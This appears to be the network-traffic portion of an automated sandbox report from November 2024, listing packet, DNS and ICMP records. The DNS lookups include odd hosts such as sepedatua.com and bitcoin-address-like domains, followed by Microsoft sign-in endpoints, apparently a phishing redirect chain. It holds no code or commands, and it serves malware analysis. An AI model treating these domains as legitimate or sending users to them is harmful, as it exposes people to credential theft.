                                                                                                                              Nov 18, 2024 17:57:16.395229101 CET4434984935.190.80.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:16.395536900 CET49849443192.168.2.1735.190.80.1
                                                                                                                              Nov 18, 2024 17:57:16.395610094 CET4434984935.190.80.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:16.395673037 CET49849443192.168.2.1735.190.80.1
                                                                                                                              Nov 18, 2024 17:57:16.396073103 CET49854443192.168.2.1735.190.80.1
                                                                                                                              Nov 18, 2024 17:57:16.396100044 CET4434985435.190.80.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:16.396181107 CET49854443192.168.2.1735.190.80.1
                                                                                                                              Nov 18, 2024 17:57:16.396414042 CET49854443192.168.2.1735.190.80.1
                                                                                                                              Nov 18, 2024 17:57:16.396428108 CET4434985435.190.80.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:16.409532070 CET4434985135.190.80.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:16.409858942 CET49851443192.168.2.1735.190.80.1
                                                                                                                              Nov 18, 2024 17:57:16.409975052 CET4434985135.190.80.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:16.410043001 CET49851443192.168.2.1735.190.80.1
                                                                                                                              Nov 18, 2024 17:57:16.410463095 CET49855443192.168.2.1735.190.80.1
                                                                                                                              Nov 18, 2024 17:57:16.410506010 CET4434985535.190.80.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:16.410797119 CET49855443192.168.2.1735.190.80.1
                                                                                                                              Nov 18, 2024 17:57:16.410865068 CET49855443192.168.2.1735.190.80.1
                                                                                                                              Nov 18, 2024 17:57:16.410876036 CET4434985535.190.80.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:17.001966000 CET4434985335.190.80.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:17.002136946 CET4434985435.190.80.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:17.002263069 CET49853443192.168.2.1735.190.80.1
                                                                                                                              Nov 18, 2024 17:57:17.002279997 CET4434985335.190.80.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:17.002401114 CET49854443192.168.2.1735.190.80.1
                                                                                                                              Nov 18, 2024 17:57:17.002420902 CET4434985435.190.80.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:17.003355026 CET4434985335.190.80.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:17.003432989 CET49853443192.168.2.1735.190.80.1
                                                                                                                              Nov 18, 2024 17:57:17.003478050 CET4434985435.190.80.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:17.003546953 CET49854443192.168.2.1735.190.80.1
                                                                                                                              Nov 18, 2024 17:57:17.003722906 CET49853443192.168.2.1735.190.80.1
                                                                                                                              Nov 18, 2024 17:57:17.003990889 CET49854443192.168.2.1735.190.80.1
                                                                                                                              Nov 18, 2024 17:57:17.004009008 CET4434985335.190.80.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:17.004055023 CET4434985435.190.80.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:17.004102945 CET49853443192.168.2.1735.190.80.1
                                                                                                                              Nov 18, 2024 17:57:17.004111052 CET4434985335.190.80.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:17.004146099 CET49854443192.168.2.1735.190.80.1
                                                                                                                              Nov 18, 2024 17:57:17.004153013 CET4434985435.190.80.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:17.009823084 CET4434985252.108.10.254192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:17.009938955 CET49852443192.168.2.1752.108.10.254
                                                                                                                              Nov 18, 2024 17:57:17.013060093 CET49852443192.168.2.1752.108.10.254
                                                                                                                              Nov 18, 2024 17:57:17.013066053 CET4434985252.108.10.254192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:17.013225079 CET49852443192.168.2.1752.108.10.254
                                                                                                                              Nov 18, 2024 17:57:17.013231039 CET4434985252.108.10.254192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:17.013299942 CET4434985252.108.10.254192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:17.013361931 CET49852443192.168.2.1752.108.10.254
                                                                                                                              Nov 18, 2024 17:57:17.022458076 CET4434985535.190.80.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:17.022757053 CET49855443192.168.2.1735.190.80.1
                                                                                                                              Nov 18, 2024 17:57:17.022764921 CET4434985535.190.80.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:17.023919106 CET4434985535.190.80.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:17.024220943 CET49855443192.168.2.1735.190.80.1
                                                                                                                              Nov 18, 2024 17:57:17.024347067 CET49855443192.168.2.1735.190.80.1
                                                                                                                              Nov 18, 2024 17:57:17.024350882 CET4434985535.190.80.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:17.024391890 CET4434985535.190.80.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:17.057830095 CET49853443192.168.2.1735.190.80.1
                                                                                                                              Nov 18, 2024 17:57:17.057845116 CET49854443192.168.2.1735.190.80.1
                                                                                                                              Nov 18, 2024 17:57:17.073832989 CET49855443192.168.2.1735.190.80.1
                                                                                                                              Nov 18, 2024 17:57:17.154164076 CET4434985252.108.10.254192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:17.154263020 CET49852443192.168.2.1752.108.10.254
                                                                                                                              Nov 18, 2024 17:57:17.154277086 CET4434985252.108.10.254192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:17.154325008 CET49852443192.168.2.1752.108.10.254
                                                                                                                              Nov 18, 2024 17:57:17.155364037 CET49852443192.168.2.1752.108.10.254
                                                                                                                              Nov 18, 2024 17:57:17.155402899 CET4434985252.108.10.254192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:17.155474901 CET49852443192.168.2.1752.108.10.254
                                                                                                                              Nov 18, 2024 17:57:17.155780077 CET4434985435.190.80.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:17.155829906 CET4434985335.190.80.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:17.156172991 CET49854443192.168.2.1735.190.80.1
                                                                                                                              Nov 18, 2024 17:57:17.156250954 CET4434985435.190.80.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:17.156316996 CET49854443192.168.2.1735.190.80.1
                                                                                                                              Nov 18, 2024 17:57:17.156452894 CET49853443192.168.2.1735.190.80.1
                                                                                                                              Nov 18, 2024 17:57:17.156491041 CET4434985335.190.80.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:17.156543970 CET49853443192.168.2.1735.190.80.1
                                                                                                                              Nov 18, 2024 17:57:17.161444902 CET49856443192.168.2.1752.108.10.254
                                                                                                                              Nov 18, 2024 17:57:17.161474943 CET4434985652.108.10.254192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:17.161559105 CET49856443192.168.2.1752.108.10.254
                                                                                                                              Nov 18, 2024 17:57:17.161792994 CET49856443192.168.2.1752.108.10.254
                                                                                                                              Nov 18, 2024 17:57:17.161804914 CET4434985652.108.10.254192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:17.168675900 CET4434985535.190.80.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:17.168975115 CET49855443192.168.2.1735.190.80.1
                                                                                                                              Nov 18, 2024 17:57:17.169054985 CET4434985535.190.80.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:17.169120073 CET49855443192.168.2.1735.190.80.1
                                                                                                                              Nov 18, 2024 17:57:18.081166983 CET4434985652.108.10.254192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:18.081312895 CET49856443192.168.2.1752.108.10.254
                                                                                                                              Nov 18, 2024 17:57:18.085962057 CET49856443192.168.2.1752.108.10.254
                                                                                                                              Nov 18, 2024 17:57:18.085977077 CET4434985652.108.10.254192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:18.086152077 CET49856443192.168.2.1752.108.10.254
                                                                                                                              Nov 18, 2024 17:57:18.086160898 CET4434985652.108.10.254192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:18.086256981 CET4434985652.108.10.254192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:18.086308956 CET49856443192.168.2.1752.108.10.254
                                                                                                                              Nov 18, 2024 17:57:18.223098993 CET4434985652.108.10.254192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:18.223203897 CET49856443192.168.2.1752.108.10.254
                                                                                                                              Nov 18, 2024 17:57:18.223232985 CET4434985652.108.10.254192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:18.223279953 CET49856443192.168.2.1752.108.10.254
                                                                                                                              Nov 18, 2024 17:57:18.236641884 CET4434985652.108.10.254192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:18.236721992 CET49856443192.168.2.1752.108.10.254
                                                                                                                              Nov 18, 2024 17:57:18.236768007 CET4434985652.108.10.254192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:18.236828089 CET49856443192.168.2.1752.108.10.254
                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Nov 18, 2024 17:55:39.498420000 CET4955153192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:55:39.498692989 CET5279353192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:55:39.784553051 CET53524231.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:39.785670996 CET53627921.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:39.787935019 CET53527931.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:39.924262047 CET53495511.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:40.846175909 CET6427953192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:55:40.846457958 CET6154653192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:55:41.227804899 CET53651241.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:41.237345934 CET53615461.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:41.328682899 CET53642791.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:44.095904112 CET5683753192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:55:44.096046925 CET6501653192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:55:44.102756977 CET53568371.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:44.103127003 CET53650161.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:44.416136026 CET5095353192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:55:44.416357040 CET6094253192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:55:44.700195074 CET53609421.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:44.723469973 CET53509531.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:45.749808073 CET5637053192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:55:45.749942064 CET6210553192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:55:45.758433104 CET53563701.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:45.758544922 CET53621051.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.928811073 CET4986953192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:55:47.928957939 CET6525453192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:55:47.935441971 CET5000753192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:55:47.935741901 CET53652541.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.935777903 CET53498691.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.935801983 CET5759653192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:55:47.942389965 CET53500071.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:47.943145037 CET53575961.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:55:58.188349009 CET53504841.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:56:03.700576067 CET5134853192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:56:03.700778008 CET5505853192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:56:03.707871914 CET53513481.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:56:03.707911968 CET53550581.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:56:05.060878038 CET5694253192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:56:05.060878038 CET5421053192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:56:05.068664074 CET53569421.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:56:05.068689108 CET53542101.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:56:05.078017950 CET5389853192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:56:05.081415892 CET6036553192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:56:06.099852085 CET6326053192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:56:06.100054979 CET5101553192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:56:06.218703985 CET53603651.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:56:06.980901003 CET53538981.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:56:07.096972942 CET53510151.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:56:07.652966022 CET53632601.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:56:10.140191078 CET5170353192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:56:10.140573978 CET4957853192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:56:11.128128052 CET53517031.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:56:11.160722971 CET53495781.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:56:13.546936035 CET6294653192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:56:13.547091007 CET5086453192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:56:13.561923027 CET53508641.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:56:13.563096046 CET53629461.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:56:15.611634970 CET6438453192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:56:15.611771107 CET5963253192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:56:15.618797064 CET53643841.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:56:15.618844032 CET53596321.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:56:17.125091076 CET53496341.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:56:20.047029972 CET6449353192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:56:20.047171116 CET6217953192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:56:20.059432983 CET53644931.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:56:20.082411051 CET53621791.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:56:21.051997900 CET5415553192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:56:21.052252054 CET6234053192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:56:21.059240103 CET53541551.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:56:21.059308052 CET53623401.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:56:22.108217955 CET53573721.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:56:22.335660934 CET6248553192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:56:22.335835934 CET6205153192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:56:22.343108892 CET53624851.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:56:22.343139887 CET53620511.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:56:35.112464905 CET138138192.168.2.17192.168.2.255
                                                                                                                              Nov 18, 2024 17:56:39.355990887 CET53619701.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:56:40.048573017 CET4931253192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:56:40.048834085 CET6357153192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:56:40.064033985 CET53493121.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:56:40.064138889 CET53635711.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:56:40.149764061 CET53544591.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:56:46.924074888 CET5640953192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:56:46.924227953 CET6449753192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:56:46.939174891 CET53564091.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:56:46.960478067 CET53644971.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:08.503421068 CET53560571.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:15.624936104 CET6118653192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:57:15.625165939 CET5721153192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:57:15.631901026 CET53572111.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:15.632363081 CET53611861.1.1.1192.168.2.17
                                                                                                                              Nov 18, 2024 17:57:23.930763006 CET6267353192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:57:23.931155920 CET5441953192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:57:25.093982935 CET5330053192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:57:26.754738092 CET6248853192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:57:26.754853010 CET5426753192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:57:27.017620087 CET5359953192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:57:27.017738104 CET5015153192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:57:28.621217012 CET5261153192.168.2.171.1.1.1
                                                                                                                              Nov 18, 2024 17:57:28.621324062 CET6157653192.168.2.171.1.1.1
                                                                                                                              TimestampSource IPDest IPChecksumCodeType
                                                                                                                              Nov 18, 2024 17:56:07.097079039 CET192.168.2.171.1.1.1c22b(Port unreachable)Destination Unreachable
                                                                                                                              Nov 18, 2024 17:56:20.082556009 CET192.168.2.171.1.1.1c296(Port unreachable)Destination Unreachable
                                                                                                                              Nov 18, 2024 17:56:46.960556984 CET192.168.2.171.1.1.1c296(Port unreachable)Destination Unreachable
                                                                                                                              Nov 18, 2024 17:57:25.252285957 CET192.168.2.171.1.1.1c2cd(Port unreachable)Destination Unreachable
                                                                                                                              Nov 18, 2024 17:57:27.169583082 CET192.168.2.171.1.1.1c2cd(Port unreachable)Destination Unreachable
                                                                                                                              Nov 18, 2024 17:57:28.367212057 CET192.168.2.171.1.1.1c29b(Port unreachable)Destination Unreachable
                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                              Nov 18, 2024 17:55:39.498420000 CET192.168.2.171.1.1.10xf52cStandard query (0)r.neurotags.netA (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:55:39.498692989 CET192.168.2.171.1.1.10xc985Standard query (0)r.neurotags.net65IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:55:40.846175909 CET192.168.2.171.1.1.10x5e1fStandard query (0)sepedatua.comA (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:55:40.846457958 CET192.168.2.171.1.1.10x219Standard query (0)sepedatua.com65IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:55:44.095904112 CET192.168.2.171.1.1.10xb7d5Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:55:44.096046925 CET192.168.2.171.1.1.10x8b50Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:55:44.416136026 CET192.168.2.171.1.1.10x787fStandard query (0)timesofvartha.comA (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:55:44.416357040 CET192.168.2.171.1.1.10x98ccStandard query (0)timesofvartha.com65IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:55:45.749808073 CET192.168.2.171.1.1.10xce72Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:55:45.749942064 CET192.168.2.171.1.1.10x9563Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:55:47.928811073 CET192.168.2.171.1.1.10xbe3Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:55:47.928957939 CET192.168.2.171.1.1.10x7a2fStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:55:47.935441971 CET192.168.2.171.1.1.10x19fdStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:55:47.935801983 CET192.168.2.171.1.1.10x9bfcStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:03.700576067 CET192.168.2.171.1.1.10xfb7fStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:03.700778008 CET192.168.2.171.1.1.10x9e08Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:05.060878038 CET192.168.2.171.1.1.10xf7dStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:05.060878038 CET192.168.2.171.1.1.10xd6a4Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:05.078017950 CET192.168.2.171.1.1.10x1b1eStandard query (0)bc1qlpk73pgj3dz02nq8d9kpdxk.orgA (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:05.081415892 CET192.168.2.171.1.1.10xa9daStandard query (0)bc1qlpk73pgj3dz02nq8d9kpdxk.org65IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:06.099852085 CET192.168.2.171.1.1.10x6a61Standard query (0)bc1qlpk73pgj3dz02nq8d9kpdxk.orgA (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:06.100054979 CET192.168.2.171.1.1.10x790dStandard query (0)bc1qlpk73pgj3dz02nq8d9kpdxk.org65IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:10.140191078 CET192.168.2.171.1.1.10xb0eaStandard query (0)bc1qlpk73pgj3dz02nq8d9kpdxk.orgA (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:10.140573978 CET192.168.2.171.1.1.10x28d4Standard query (0)bc1qlpk73pgj3dz02nq8d9kpdxk.org65IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:13.546936035 CET192.168.2.171.1.1.10x9de3Standard query (0)bc1qcr8muz00d2v7uqg5ggulrmm.comA (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:13.547091007 CET192.168.2.171.1.1.10x95ceStandard query (0)bc1qcr8muz00d2v7uqg5ggulrmm.com65IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:15.611634970 CET192.168.2.171.1.1.10xef1dStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:15.611771107 CET192.168.2.171.1.1.10x5ff2Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:20.047029972 CET192.168.2.171.1.1.10xf6e1Standard query (0)bc1qcr8muz00d2v7uqg5ggulrmm.comA (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:20.047171116 CET192.168.2.171.1.1.10x3989Standard query (0)bc1qcr8muz00d2v7uqg5ggulrmm.com65IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:21.051997900 CET192.168.2.171.1.1.10x54caStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:21.052252054 CET192.168.2.171.1.1.10x5028Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:22.335660934 CET192.168.2.171.1.1.10xee78Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:22.335835934 CET192.168.2.171.1.1.10x3838Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:40.048573017 CET192.168.2.171.1.1.10x3d68Standard query (0)bc1qv5p8dwc98n3judrczkmpkjz.comA (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:40.048834085 CET192.168.2.171.1.1.10x73dbStandard query (0)bc1qv5p8dwc98n3judrczkmpkjz.com65IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:46.924074888 CET192.168.2.171.1.1.10xe1adStandard query (0)bc1qv5p8dwc98n3judrczkmpkjz.comA (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:56:46.924227953 CET192.168.2.171.1.1.10xb145Standard query (0)bc1qv5p8dwc98n3judrczkmpkjz.com65IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:57:15.624936104 CET192.168.2.171.1.1.10xf698Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:57:15.625165939 CET192.168.2.171.1.1.10x5321Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:57:23.930763006 CET192.168.2.171.1.1.10xc249Standard query (0)passwordreset.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:57:23.931155920 CET192.168.2.171.1.1.10x9b06Standard query (0)passwordreset.microsoftonline.com65IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:57:25.093982935 CET192.168.2.171.1.1.10x91b2Standard query (0)passwordreset.microsoftonline.com65IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:57:26.754738092 CET192.168.2.171.1.1.10x7af2Standard query (0)ajax.aspnetcdn.comA (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:57:26.754853010 CET192.168.2.171.1.1.10x46eeStandard query (0)ajax.aspnetcdn.com65IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:57:27.017620087 CET192.168.2.171.1.1.10xca44Standard query (0)passwordreset.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:57:27.017738104 CET192.168.2.171.1.1.10xc3dcStandard query (0)passwordreset.microsoftonline.com65IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:57:28.621217012 CET192.168.2.171.1.1.10x9b93Standard query (0)ajax.aspnetcdn.comA (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:57:28.621324062 CET192.168.2.171.1.1.10x1edStandard query (0)ajax.aspnetcdn.com65IN (0x0001)false
                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                              Nov 18, 2024 17:55:39.924262047 CET1.1.1.1192.168.2.170xf52cNo error (0)r.neurotags.net34.168.114.70A (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:55:41.328682899 CET1.1.1.1192.168.2.170x5e1fNo error (0)sepedatua.com103.134.152.12A (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:55:44.102756977 CET1.1.1.1192.168.2.170xb7d5No error (0)www.google.com142.250.186.164A (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:55:44.103127003 CET1.1.1.1192.168.2.170x8b50No error (0)www.google.com65IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:55:44.723469973 CET1.1.1.1192.168.2.170x787fNo error (0)timesofvartha.com208.91.198.81A (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:55:45.758433104 CET1.1.1.1192.168.2.170xce72No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:55:45.758433104 CET1.1.1.1192.168.2.170xce72No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:55:45.758544922 CET1.1.1.1192.168.2.170x9563No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:55:47.935741901 CET1.1.1.1192.168.2.170x7a2fNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:55:47.935777903 CET1.1.1.1192.168.2.170xbe3No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:55:47.935777903 CET1.1.1.1192.168.2.170xbe3No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:55:47.942389965 CET1.1.1.1192.168.2.170x19fdNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:55:47.942389965 CET1.1.1.1192.168.2.170x19fdNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                              Nov 18, 2024 17:55:47.943145037 CET1.1.1.1192.168.2.170x9bfcNo error (0)challenges.cloudflare.com65IN (0x0001)false
